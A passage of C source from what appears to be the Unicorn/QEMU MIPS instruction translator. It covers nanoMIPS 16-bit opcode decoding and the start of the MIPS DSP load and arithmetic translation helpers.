uint32_t op; int rt = decode_gpr_gpr3(NANOMIPS_EXTRACT_RT3(ctx->opcode)); int rs = decode_gpr_gpr3(NANOMIPS_EXTRACT_RS3(ctx->opcode)); int rd = decode_gpr_gpr3(NANOMIPS_EXTRACT_RD3(ctx->opcode)); int offset; int imm; /* make sure instructions are on a halfword boundary */ if (ctx->base.pc_next & 0x1) { TCGv tmp = tcg_const_tl(tcg_ctx, ctx->base.pc_next); tcg_gen_st_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr)); tcg_temp_free(tcg_ctx, tmp); generate_exception_end(ctx, EXCP_AdEL); return 2; } op = extract32(ctx->opcode, 10, 6); switch (op) { case NM_P16_MV: rt = NANOMIPS_EXTRACT_RD5(ctx->opcode); if (rt != 0) { /* MOVE */ rs = NANOMIPS_EXTRACT_RS5(ctx->opcode); gen_arith(ctx, OPC_ADDU, rt, rs, 0); } else { /* P16.RI */ switch (extract32(ctx->opcode, 3, 2)) { case NM_P16_SYSCALL: if (extract32(ctx->opcode, 2, 1) == 0) { generate_exception_end(ctx, EXCP_SYSCALL); } else { generate_exception_end(ctx, EXCP_RI); } break; case NM_BREAK16: generate_exception_end(ctx, EXCP_BREAK); break; case NM_SDBBP16: if (is_uhi(extract32(ctx->opcode, 0, 3))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { if (ctx->hflags & MIPS_HFLAG_SBRI) { generate_exception_end(ctx, EXCP_RI); } else { generate_exception_end(ctx, EXCP_DBp); } } break; default: generate_exception_end(ctx, EXCP_RI); break; } } break; case NM_P16_SHIFT: { int shift = extract32(ctx->opcode, 0, 3); uint32_t opc = 0; shift = (shift == 0) ? 8 : shift; switch (extract32(ctx->opcode, 3, 1)) { case NM_SLL16: opc = OPC_SLL; break; case NM_SRL16: opc = OPC_SRL; break; } gen_shift_imm(ctx, opc, rt, rs, shift); } break; case NM_P16C: switch (ctx->opcode & 1) { case NM_POOL16C_0: gen_pool16c_nanomips_insn(ctx); break; case NM_LWXS16: gen_ldxs(ctx, rt, rs, rd); break; } break; case NM_P16_A1: switch (extract32(ctx->opcode, 6, 1)) { case NM_ADDIUR1SP: imm = extract32(ctx->opcode, 0, 6) << 2; gen_arith_imm(ctx, OPC_ADDIU, rt, 29, imm); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P16_A2: switch (extract32(ctx->opcode, 3, 1)) { case NM_ADDIUR2: imm = extract32(ctx->opcode, 0, 3) << 2; gen_arith_imm(ctx, OPC_ADDIU, rt, rs, imm); break; case NM_P_ADDIURS5: rt = extract32(ctx->opcode, 5, 5); if (rt != 0) { /* imm = sign_extend(s[3] . s[2:0] , from_nbits = 4) */ imm = (sextract32(ctx->opcode, 4, 1) << 3) | (extract32(ctx->opcode, 0, 3)); gen_arith_imm(ctx, OPC_ADDIU, rt, rt, imm); } break; } break; case NM_P16_ADDU: switch (ctx->opcode & 0x1) { case NM_ADDU16: gen_arith(ctx, OPC_ADDU, rd, rs, rt); break; case NM_SUBU16: gen_arith(ctx, OPC_SUBU, rd, rs, rt); break; } break; case NM_P16_4X4: rt = (extract32(ctx->opcode, 9, 1) << 3) | extract32(ctx->opcode, 5, 3); rs = (extract32(ctx->opcode, 4, 1) << 3) | extract32(ctx->opcode, 0, 3); rt = decode_gpr_gpr4(rt); rs = decode_gpr_gpr4(rs); switch ((extract32(ctx->opcode, 7, 2) & 0x2) | (extract32(ctx->opcode, 3, 1))) { case NM_ADDU4X4: check_nms(ctx); gen_arith(ctx, OPC_ADDU, rt, rs, rt); break; case NM_MUL4X4: check_nms(ctx); gen_r6_muldiv(ctx, R6_OPC_MUL, rt, rs, rt); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_LI16: { int imm = extract32(ctx->opcode, 0, 7); imm = (imm == 0x7f ? -1 : imm); if (rt != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], imm); } } break; case NM_ANDI16: { uint32_t u = extract32(ctx->opcode, 0, 4); u = (u == 12) ? 0xff : (u == 13) ? 0xffff : u; gen_logic_imm(ctx, OPC_ANDI, rt, rs, u); } break; case NM_P16_LB: offset = extract32(ctx->opcode, 0, 2); switch (extract32(ctx->opcode, 2, 2)) { case NM_LB16: gen_ld(ctx, OPC_LB, rt, rs, offset); break; case NM_SB16: rt = decode_gpr_gpr3_src_store( NANOMIPS_EXTRACT_RT3(ctx->opcode)); gen_st(ctx, OPC_SB, rt, rs, offset); break; case NM_LBU16: gen_ld(ctx, OPC_LBU, rt, rs, offset); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P16_LH: offset = extract32(ctx->opcode, 1, 2) << 1; switch ((extract32(ctx->opcode, 3, 1) << 1) | (ctx->opcode & 1)) { case NM_LH16: gen_ld(ctx, OPC_LH, rt, rs, offset); break; case NM_SH16: rt = decode_gpr_gpr3_src_store( NANOMIPS_EXTRACT_RT3(ctx->opcode)); gen_st(ctx, OPC_SH, rt, rs, offset); break; case NM_LHU16: gen_ld(ctx, OPC_LHU, rt, rs, offset); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_LW16: offset = extract32(ctx->opcode, 0, 4) << 2; gen_ld(ctx, OPC_LW, rt, rs, offset); break; case NM_LWSP16: rt = NANOMIPS_EXTRACT_RD5(ctx->opcode); offset = extract32(ctx->opcode, 0, 5) << 2; gen_ld(ctx, OPC_LW, rt, 29, offset); break; case NM_LW4X4: check_nms(ctx); rt = (extract32(ctx->opcode, 9, 1) << 3) | extract32(ctx->opcode, 5, 3); rs = (extract32(ctx->opcode, 4, 1) << 3) | extract32(ctx->opcode, 0, 3); offset = (extract32(ctx->opcode, 3, 1) << 3) | (extract32(ctx->opcode, 8, 1) << 2); rt = decode_gpr_gpr4(rt); rs = decode_gpr_gpr4(rs); gen_ld(ctx, OPC_LW, rt, rs, offset); break; case NM_SW4X4: check_nms(ctx); rt = (extract32(ctx->opcode, 9, 1) << 3) | extract32(ctx->opcode, 5, 3); rs = (extract32(ctx->opcode, 4, 1) << 3) | extract32(ctx->opcode, 0, 3); offset = (extract32(ctx->opcode, 3, 1) << 3) | (extract32(ctx->opcode, 8, 1) << 2); rt = decode_gpr_gpr4_zero(rt); rs = decode_gpr_gpr4(rs); gen_st(ctx, OPC_SW, rt, rs, offset); break; case NM_LWGP16: offset = extract32(ctx->opcode, 0, 7) << 2; gen_ld(ctx, OPC_LW, rt, 28, offset); break; case NM_SWSP16: rt = NANOMIPS_EXTRACT_RD5(ctx->opcode); offset = extract32(ctx->opcode, 0, 5) << 2; gen_st(ctx, OPC_SW, rt, 29, offset); break; case NM_SW16: rt = decode_gpr_gpr3_src_store( NANOMIPS_EXTRACT_RT3(ctx->opcode)); rs = decode_gpr_gpr3(NANOMIPS_EXTRACT_RS3(ctx->opcode)); offset = extract32(ctx->opcode, 0, 4) << 2; gen_st(ctx, OPC_SW, rt, rs, offset); break; case NM_SWGP16: rt = decode_gpr_gpr3_src_store( NANOMIPS_EXTRACT_RT3(ctx->opcode)); offset = extract32(ctx->opcode, 0, 7) << 2; gen_st(ctx, OPC_SW, rt, 28, offset); break; case NM_BC16: gen_compute_branch_nm(ctx, OPC_BEQ, 2, 0, 0, (sextract32(ctx->opcode, 0, 1) << 10) | (extract32(ctx->opcode, 1, 9) << 1)); break; case NM_BALC16: gen_compute_branch_nm(ctx, OPC_BGEZAL, 2, 0, 0, (sextract32(ctx->opcode, 0, 1) << 10) | (extract32(ctx->opcode, 1, 9) << 1)); break; case NM_BEQZC16: gen_compute_branch_nm(ctx, OPC_BEQ, 2, rt, 0, (sextract32(ctx->opcode, 0, 1) << 7) | (extract32(ctx->opcode, 1, 6) << 1)); break; case NM_BNEZC16: gen_compute_branch_nm(ctx, OPC_BNE, 2, rt, 0, (sextract32(ctx->opcode, 0, 1) << 7) | (extract32(ctx->opcode, 1, 6) << 1)); break; case NM_P16_BR: switch (ctx->opcode & 0xf) { case 0: /* P16.JRC */ switch (extract32(ctx->opcode, 4, 1)) { case NM_JRC: gen_compute_branch_nm(ctx, OPC_JR, 2, extract32(ctx->opcode, 5, 5), 0, 0); break; case NM_JALRC16: gen_compute_branch_nm(ctx, OPC_JALR, 2, extract32(ctx->opcode, 5, 5), 31, 0); break; } break; default: { /* P16.BRI */ uint32_t opc = extract32(ctx->opcode, 4, 3) < extract32(ctx->opcode, 7, 3) ? OPC_BEQ : OPC_BNE; gen_compute_branch_nm(ctx, opc, 2, rs, rt, extract32(ctx->opcode, 0, 4) << 1); } break; } break; case NM_P16_SR: { int count = extract32(ctx->opcode, 0, 4); int u = extract32(ctx->opcode, 4, 4) << 4; rt = 30 + extract32(ctx->opcode, 9, 1); switch (extract32(ctx->opcode, 8, 1)) { case NM_SAVE16: gen_save(ctx, rt, count, 0, u); break; case NM_RESTORE_JRC16: gen_restore(ctx, rt, count, 0, u); gen_compute_branch_nm(ctx, OPC_JR, 2, 31, 0, 0); break; } } break; case NM_MOVEP: case NM_MOVEPREV: check_nms(ctx); { static const int gpr2reg1[] = {4, 5, 6, 7}; static const int gpr2reg2[] = {5, 6, 7, 8}; int re; int rd2 = extract32(ctx->opcode, 3, 1) << 1 | extract32(ctx->opcode, 8, 1); int r1 = gpr2reg1[rd2]; int r2 = gpr2reg2[rd2]; int r3 = extract32(ctx->opcode, 4, 1) << 3 | extract32(ctx->opcode, 0, 3); int r4 = extract32(ctx->opcode, 9, 1) << 3 | extract32(ctx->opcode, 5, 3); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); if (op == NM_MOVEP) { rd = r1; re = r2; rs = decode_gpr_gpr4_zero(r3); rt = decode_gpr_gpr4_zero(r4); } else { rd = decode_gpr_gpr4(r3); re = decode_gpr_gpr4(r4); rs = r1; rt = r2; } gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[re], t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; default: return decode_nanomips_32_48_opc(env, ctx); } return 2; } /* SmartMIPS extension to MIPS32 */ #if defined(TARGET_MIPS64) /* MDMX extension to MIPS64 */ #endif /* MIPSDSP functions. */ static void gen_mipsdsp_ld(DisasContext *ctx, uint32_t opc, int rd, int base, int offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; check_dsp(ctx); t0 = tcg_temp_new(tcg_ctx); if (base == 0) { gen_load_gpr(tcg_ctx, t0, offset); } else if (offset == 0) { gen_load_gpr(tcg_ctx, t0, base); } else { gen_op_addr_add(ctx, t0, tcg_ctx->cpu_gpr[base], tcg_ctx->cpu_gpr[offset]); } switch (opc) { case OPC_LBUX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_UB); gen_store_gpr(tcg_ctx, t0, rd); break; case OPC_LHX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESW); gen_store_gpr(tcg_ctx, t0, rd); break; case OPC_LWX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t0, rd); break; #if defined(TARGET_MIPS64) case OPC_LDX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TEQ); gen_store_gpr(tcg_ctx, t0, rd); break; #endif } tcg_temp_free(tcg_ctx, t0); } static void gen_mipsdsp_arith(DisasContext *ctx, uint32_t op1, uint32_t op2, int ret, int v1, int v2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv v1_t; TCGv v2_t; if (ret == 0) { /* Treat as NOP. */ return; } v1_t = tcg_temp_new(tcg_ctx); v2_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v1_t, v1); gen_load_gpr(tcg_ctx, v2_t, v2); switch (op1) { /* OPC_MULT_G_2E is equal OPC_ADDUH_QB_DSP */ case OPC_MULT_G_2E: check_dsp_r2(ctx); switch (op2) { case OPC_ADDUH_QB: gen_helper_adduh_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDUH_R_QB: gen_helper_adduh_r_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDQH_PH: gen_helper_addqh_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDQH_R_PH: gen_helper_addqh_r_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDQH_W: gen_helper_addqh_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDQH_R_W: gen_helper_addqh_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBUH_QB: gen_helper_subuh_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBUH_R_QB: gen_helper_subuh_r_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBQH_PH: gen_helper_subqh_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBQH_R_PH: gen_helper_subqh_r_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBQH_W: gen_helper_subqh_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBQH_R_W: gen_helper_subqh_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; } break; case OPC_ABSQ_S_PH_DSP: switch (op2) { case OPC_ABSQ_S_QB: check_dsp_r2(ctx); gen_helper_absq_s_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; case OPC_ABSQ_S_PH: check_dsp(ctx); gen_helper_absq_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; case OPC_ABSQ_S_W: check_dsp(ctx); gen_helper_absq_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; case OPC_PRECEQ_W_PHL: check_dsp(ctx); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, 0xFFFF0000); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret]); break; case OPC_PRECEQ_W_PHR: check_dsp(ctx); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, 0x0000FFFF); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], 16); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret]); break; case OPC_PRECEQU_PH_QBL: check_dsp(ctx); gen_helper_precequ_ph_qbl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_PH_QBR: check_dsp(ctx); gen_helper_precequ_ph_qbr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_PH_QBLA: check_dsp(ctx); gen_helper_precequ_ph_qbla(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_PH_QBRA: check_dsp(ctx); gen_helper_precequ_ph_qbra(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_PH_QBL: check_dsp(ctx); gen_helper_preceu_ph_qbl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_PH_QBR: check_dsp(ctx); gen_helper_preceu_ph_qbr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_PH_QBLA: check_dsp(ctx); gen_helper_preceu_ph_qbla(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_PH_QBRA: check_dsp(ctx); gen_helper_preceu_ph_qbra(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; } break; case OPC_ADDU_QB_DSP: switch (op2) { case OPC_ADDQ_PH: check_dsp(ctx); gen_helper_addq_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDQ_S_PH: check_dsp(ctx); gen_helper_addq_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDQ_S_W: check_dsp(ctx); gen_helper_addq_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_QB: check_dsp(ctx); gen_helper_addu_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_S_QB: check_dsp(ctx); gen_helper_addu_s_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_PH: check_dsp_r2(ctx); gen_helper_addu_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_S_PH: check_dsp_r2(ctx); gen_helper_addu_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_PH: check_dsp(ctx); gen_helper_subq_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_S_PH: check_dsp(ctx); gen_helper_subq_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_S_W: check_dsp(ctx); gen_helper_subq_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_QB: check_dsp(ctx); gen_helper_subu_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_S_QB: check_dsp(ctx); gen_helper_subu_s_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_PH: check_dsp_r2(ctx); gen_helper_subu_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_S_PH: check_dsp_r2(ctx); gen_helper_subu_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDSC: check_dsp(ctx); gen_helper_addsc(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDWC: check_dsp(ctx); gen_helper_addwc(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MODSUB: check_dsp(ctx); gen_helper_modsub(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_RADDU_W_QB: check_dsp(ctx); gen_helper_raddu_w_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t); break; } break; case OPC_CMPU_EQ_QB_DSP: switch (op2) { case OPC_PRECR_QB_PH: check_dsp_r2(ctx); gen_helper_precr_qb_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECRQ_QB_PH: check_dsp(ctx); gen_helper_precrq_qb_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECR_SRA_PH_W: check_dsp_r2(ctx); { TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, v2); gen_helper_precr_sra_ph_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], sa_t, v1_t, tcg_ctx->cpu_gpr[ret]); tcg_temp_free_i32(tcg_ctx, sa_t); break; } case OPC_PRECR_SRA_R_PH_W: check_dsp_r2(ctx); { TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, v2); gen_helper_precr_sra_r_ph_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], sa_t, v1_t, tcg_ctx->cpu_gpr[ret]); tcg_temp_free_i32(tcg_ctx, sa_t); break; } case OPC_PRECRQ_PH_W: check_dsp(ctx); gen_helper_precrq_ph_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECRQ_RS_PH_W: check_dsp(ctx); gen_helper_precrq_rs_ph_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PRECRQU_S_QB_PH: check_dsp(ctx); gen_helper_precrqu_s_qb_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #ifdef TARGET_MIPS64 case OPC_ABSQ_S_QH_DSP: switch (op2) { case OPC_PRECEQ_L_PWL: check_dsp(ctx); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, 0xFFFFFFFF00000000ull); break; case OPC_PRECEQ_L_PWR: check_dsp(ctx); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, 32); break; case OPC_PRECEQ_PW_QHL: check_dsp(ctx); gen_helper_preceq_pw_qhl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQ_PW_QHR: check_dsp(ctx); gen_helper_preceq_pw_qhr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQ_PW_QHLA: check_dsp(ctx); gen_helper_preceq_pw_qhla(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQ_PW_QHRA: check_dsp(ctx); gen_helper_preceq_pw_qhra(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_QH_OBL: check_dsp(ctx); gen_helper_precequ_qh_obl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_QH_OBR: check_dsp(ctx); gen_helper_precequ_qh_obr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_QH_OBLA: check_dsp(ctx); gen_helper_precequ_qh_obla(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_QH_OBRA: check_dsp(ctx); gen_helper_precequ_qh_obra(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_QH_OBL: check_dsp(ctx); gen_helper_preceu_qh_obl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_QH_OBR: check_dsp(ctx); gen_helper_preceu_qh_obr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_QH_OBLA: check_dsp(ctx); gen_helper_preceu_qh_obla(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_QH_OBRA: check_dsp(ctx); gen_helper_preceu_qh_obra(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_ABSQ_S_OB: check_dsp_r2(ctx); gen_helper_absq_s_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; case OPC_ABSQ_S_PW: check_dsp(ctx); gen_helper_absq_s_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; case OPC_ABSQ_S_QH: check_dsp(ctx); gen_helper_absq_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; } break; case OPC_ADDU_OB_DSP: switch (op2) { case OPC_RADDU_L_OB: check_dsp(ctx); gen_helper_raddu_l_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t); break; case OPC_SUBQ_PW: check_dsp(ctx); gen_helper_subq_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_S_PW: check_dsp(ctx); gen_helper_subq_s_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_QH: check_dsp(ctx); gen_helper_subq_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_S_QH: check_dsp(ctx); gen_helper_subq_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_OB: check_dsp(ctx); gen_helper_subu_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_S_OB: check_dsp(ctx); gen_helper_subu_s_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_QH: check_dsp_r2(ctx); gen_helper_subu_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_S_QH: check_dsp_r2(ctx); gen_helper_subu_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBUH_OB: check_dsp_r2(ctx); gen_helper_subuh_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBUH_R_OB: check_dsp_r2(ctx); gen_helper_subuh_r_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDQ_PW: check_dsp(ctx); gen_helper_addq_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDQ_S_PW: check_dsp(ctx); gen_helper_addq_s_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDQ_QH: check_dsp(ctx); gen_helper_addq_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDQ_S_QH: check_dsp(ctx); gen_helper_addq_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_OB: check_dsp(ctx); gen_helper_addu_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_S_OB: check_dsp(ctx); gen_helper_addu_s_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_QH: check_dsp_r2(ctx); gen_helper_addu_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_S_QH: check_dsp_r2(ctx); gen_helper_addu_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDUH_OB: check_dsp_r2(ctx); gen_helper_adduh_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDUH_R_OB: check_dsp_r2(ctx); gen_helper_adduh_r_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; } break; case OPC_CMPU_EQ_OB_DSP: switch (op2) { case OPC_PRECR_OB_QH: check_dsp_r2(ctx); gen_helper_precr_ob_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECR_SRA_QH_PW: check_dsp_r2(ctx); { TCGv_i32 ret_t = tcg_const_i32(tcg_ctx, ret); gen_helper_precr_sra_qh_pw(tcg_ctx, v2_t, v1_t, v2_t, ret_t); tcg_temp_free_i32(tcg_ctx, ret_t); break; } case OPC_PRECR_SRA_R_QH_PW: check_dsp_r2(ctx); { TCGv_i32 sa_v = tcg_const_i32(tcg_ctx, ret); gen_helper_precr_sra_r_qh_pw(tcg_ctx, v2_t, v1_t, v2_t, sa_v); tcg_temp_free_i32(tcg_ctx, sa_v); break; } case OPC_PRECRQ_OB_QH: check_dsp(ctx); gen_helper_precrq_ob_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECRQ_PW_L: check_dsp(ctx); gen_helper_precrq_pw_l(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECRQ_QH_PW: check_dsp(ctx); gen_helper_precrq_qh_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECRQ_RS_QH_PW: check_dsp(ctx); gen_helper_precrq_rs_qh_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PRECRQU_S_OB_QH: check_dsp(ctx); gen_helper_precrqu_s_ob_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #endif } tcg_temp_free(tcg_ctx, v1_t); tcg_temp_free(tcg_ctx, v2_t); } static void gen_mipsdsp_shift(DisasContext *ctx, uint32_t opc, int ret, int v1, int v2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; TCGv 